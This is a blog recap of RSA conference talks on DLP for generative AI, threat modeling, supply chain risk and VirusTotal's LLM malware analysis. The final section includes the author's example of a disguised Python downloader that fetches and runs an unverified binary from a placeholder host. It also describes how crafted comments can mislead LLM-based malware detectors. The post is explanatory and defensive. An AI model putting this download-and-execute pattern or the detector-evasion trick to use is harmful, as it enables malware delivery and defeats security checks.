The first day of RSA reveals that the AI hype continues. Last year, ChatGPT and XDR were the most mentioned topics. This year, there’s no mention of XDR (or Next Gen SIEM), but about 60% of all track sessions have the word AI in the title, including 3 out of the 5 sessions I attended today.
My focus at this RSA is to learn more about Data Loss Prevention, third-party risk, and threat intel. I selected track sessions based on whether they would be directly applicable to my work. Here are the sessions I joined today:
- Use Generative AI to End Your Love/Hate Relationship with DLP
- Redefining Threat Modeling: Security Team Goes on Vacation
- Can You Spot a Fake? AI and Cyber Risk in Luxury Retail
- What Hacking the Planet Taught Us About Defending Supply Chain Attacks
- How AI is Changing the Malware Landscape
Overall, the start of the conference was great. Most sessions met the expectations, and some even exceeded them.
Use Generative AI to End Your Love/Hate Relationship with DLP
The first talk today was given by Heidi Shey, an analyst at Forrester specializing in DLP. The topic was how to apply DLP (Data Loss Prevention) to AI, not, as I had initially expected from the title, how to use generative AI in your DLP program.
Heidi defined four ways in which companies are using GenAI:
- Bring Your Own AI (BYOAI): people use their own tools, such as ChatGPT, in their work
- Embedded in other software
- Tuning and engineering a pre-trained model
- A completely custom model
All of these uses require a different approach from a DLP perspective. For example, many companies initially block BYOAI; however, it is impossible to keep people from using it, and it is better to put controls in place. Proposed controls include creating visibility into how frequently different GPT tools are used and how popular they are, and building policy and training for employees around that. In addition, you could block certain prompts using traditional DLP tooling, as sketched below.
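To make that last control concrete, here is a minimal sketch of what regex-based prompt inspection could look like. This is my own illustration, not a feature of any specific DLP product; the pattern set and the `inspect_prompt`/`allow_prompt` helpers are hypothetical, and a real deployment would reuse the detection rules and classifiers of its existing DLP tooling.

```python
import re

# Hypothetical detection patterns; a real deployment would reuse the
# detection rules and classifiers of its existing DLP product instead.
SENSITIVE_PATTERNS = {
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "us_ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "api_key": re.compile(r"\bsk-[A-Za-z0-9]{20,}\b"),
}

def inspect_prompt(prompt: str) -> list[str]:
    """Return the names of all sensitive-data patterns found in the prompt."""
    return [name for name, pattern in SENSITIVE_PATTERNS.items()
            if pattern.search(prompt)]

def allow_prompt(prompt: str) -> bool:
    """Allow the prompt through, or block it if it matches any pattern."""
    findings = inspect_prompt(prompt)
    if findings:
        # In practice you would log this to your SIEM and notify the user.
        print(f"Blocked prompt, matched: {', '.join(findings)}")
        return False
    return True

print(allow_prompt("Summarize the attached meeting notes"))        # True
print(allow_prompt("Our test card is 4111 1111 1111 1111, why?"))  # False
```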
For AI embedded in other software, you will need to rely more on third-party risk management, access control, and data classification. For the last two approaches, you will need all of that plus additional measures around your training data, pipelines, and so on.
Overall, this talk provided some good insights. If you have the opportunity, I would definitely recommend watching the recording of this session.
Redefining Threat Modeling: Security Team Goes on Vacation
Jeevan Singh, an expert in implementing threat modeling within organizations, delivered this talk. In this session, he shared an approach for shifting left: training engineering teams to perform their own threat modeling with minimal involvement from the security team.
Before delving into his approach, he defined four levels of maturity for threat modeling:
- No threat modeling
- Foundational: threat modeling is performed, but mostly on an ad hoc basis
- Scaled maturity: threat modeling is done on a systematic basis
- Bleeding edge: most of the work is automated
Attempting to shift left only makes sense if you have a higher maturity in your threat modeling approach. You will first need to ensure that threat modeling is performed in your organization and that people understand the benefits before moving to a self-service approach.
Jeevan outlined the following steps for setting up a self-service threat modeling program in your organization:
- Training phase: engage in interactive sessions with small groups of engineers (around 6 to 10 people). Over a period of 6 weeks, conduct multiple sessions to introduce the concept of threat modeling, perform hands-on exercises, and conduct the first threat modeling session with them on a system they know.
- Observation phase: take a step back and let the engineers lead a threat modeling session. The security team joins to observe and coach. The engineers’ ability to identify critical and high-risk vulnerabilities is crucial.
- Review phase: if the engineers were able to perform a threat model in the observation phase without missing any major vulnerabilities, you can move to this phase. Here, the engineers will perform the threat modeling sessions on their own, and the security team will review the created threat model after the sessions to verify that no major risks were missed.
- Security optional phase: this is the ideal scenario where everything is done by engineering, and the security team is optional.
For more information, you can read Jeevan's blog post on his approach, where you can also find the training materials he uses to teach engineering teams to perform their own threat modeling.
This was a great session, and Jeevan shared some valuable lessons learned, wins, and challenges.
Can You Spot a Fake? AI and Cyber Risk in Luxury Retail
This panel session featured Joseph Szczerba from the FBI interviewing Nicole Darden Ford, CISO of Nordstrom, and Lauren Heyndrickx, CISO of Ralph Lauren. Based on the session's title and description, I anticipated a discussion of counterfeit products, fake e-commerce stores, and the use of AI to detect and prevent these risks. However, the session actually focused on the general topic of leveraging AI in business and implementing proper governance around these tools. Frankly, I found this session disappointing, as it did not offer any new or interesting insights; it simply reiterated the same generic advice that is commonly given. Any CISO could have sat on this panel, and no threats or approaches specific to the (luxury) retail industry were discussed.
Based on this, I would not recommend viewing the recording of this session.
What Hacking the Planet Taught Us About Defending Supply Chain Attacks
Douglas McKee and Ismael Valenzuela, both SANS instructors with backgrounds in offensive security, presented this session. They discussed an approach for managing third-party vendors and libraries to reduce the associated risks.
Douglas and Ismael began by defining two types of supply chain risk:
- External vendor: a product you purchase is compromised due to a breach at the vendor
- Vulnerable dependency: a library or Software Development Kit (SDK) used by one of your own products contains a vulnerability
They introduced the Overall Product Security Assessment process defined by SANS, which details the exact process for determining the functionality of a library or product and creating a threat model based on that. The threat model can then be used to define actions to mitigate risk.
While the session was informative and engaging, I have reservations about the practicality of the approach, especially for less mature organizations. The approach may be ideal, but it is likely infeasible to implement for more than just your most critical applications. Nonetheless, I believe the recording is worth watching if you have the opportunity.
How AI is Changing the Malware Landscape
Vicente Diaz, who works on VirusTotal at Google, presented the last session of the day. He demonstrated how VirusTotal uses GenAI to detect malicious scripts and highlighted the (in)effectiveness of GenAI in creating malware.
VirusTotal introduced a Large Language Model (LLM) in a feature called Code Insight. This feature provides a brief description generated by an LLM to explain the functionality of the uploaded file. Code Insight offers users additional information beyond the outcomes of traditional antivirus tools that VirusTotal checks. This can be particularly useful in cases where a script, for example, downloads and executes a file. Such scripts can be malicious, but legitimate installers may exhibit similar behavior.
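Code Insight's internals are not public, but the underlying idea, sending a script to an LLM and asking for an analyst-oriented summary, is easy to sketch. The snippet below is my own illustration using the OpenAI Python client; the model name and prompt wording are assumptions, and this is not VirusTotal's implementation.

```python
# Illustrative sketch of LLM-based script summarization, in the spirit of
# Code Insight. NOT VirusTotal's implementation; model and prompt are
# assumptions. Requires `pip install openai` and OPENAI_API_KEY to be set.
from openai import OpenAI

client = OpenAI()

def describe_script(source_code: str) -> str:
    """Ask an LLM for a short description of what a script does."""
    response = client.chat.completions.create(
        model="gpt-4o-mini",  # assumed model; use whatever you have access to
        messages=[
            {
                "role": "system",
                "content": (
                    "You are a malware analyst. In a few sentences, describe "
                    "what the following script does and flag any behavior "
                    "that looks malicious."
                ),
            },
            {"role": "user", "content": source_code},
        ],
    )
    return response.choices[0].message.content

sample = (
    "import urllib.request\n"
    "urllib.request.urlretrieve('http://example.com/a.bin', 'a.bin')\n"
)
print(describe_script(sample))
```

A downloader like the sample above is exactly the ambiguous case mentioned in the talk: the generated summary gives an analyst context that a bare antivirus verdict does not.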
Building on the experience with Code Insight, VirusTotal also began experimenting with LLMs to detect malware in scripts. From these experiments, they drew the following conclusions:
- LLMs are highly effective at identifying the programming language and file type of a plain-text file.
- LLMs are better at analyzing obfuscated files than traditional antivirus tools. For instance, they found that LLMs performed as well as antivirus tools for PowerShell and Office Macros, but significantly better for other scripting languages such as PHP.
However, they encountered some challenges. Since LLMs analyze not only the patterns in a script but also its variable names and comments, attackers can influence the prompts and outcomes generated by the LLM by adding specially crafted comments and variable names, as the hypothetical example below illustrates.
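To illustrate the kind of evasion Vicente described, here is a hypothetical example of my own (not one from the talk): a downloader dressed up with benign-sounding comments and identifiers. An analysis that weighs comments and variable names heavily could plausibly summarize this as a routine update checker.

```python
# Hypothetical evasion example (mine, not from the talk). Every comment and
# identifier below tells a benign "software updater" story, while the code
# actually fetches and runs an arbitrary, unverified binary.
import subprocess
import urllib.request

# Our official release server, queried once per day by the update scheduler.
UPDATE_SERVER = "http://updates.example.com/latest"  # placeholder URL

def install_latest_update() -> None:
    """Download and apply the signed product update."""
    # Fetch the 'update package' -- in reality, an arbitrary executable.
    urllib.request.urlretrieve(UPDATE_SERVER, "update.bin")
    # Apply it -- in reality, execute it with no signature verification.
    subprocess.run(["./update.bin"], check=False)
```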
Overall, I found this talk moderately interesting. There were some intriguing insights into how VirusTotal uses LLMs to analyze scripts. However, I have doubts about the research methodology: for example, the speaker mainly focused on true positives and did not report on false positives. Additionally, they only compared LLMs to traditional antivirus tooling, and I wonder how LLMs would compare to more modern EDR solutions such as CrowdStrike, Microsoft Defender, and SentinelOne.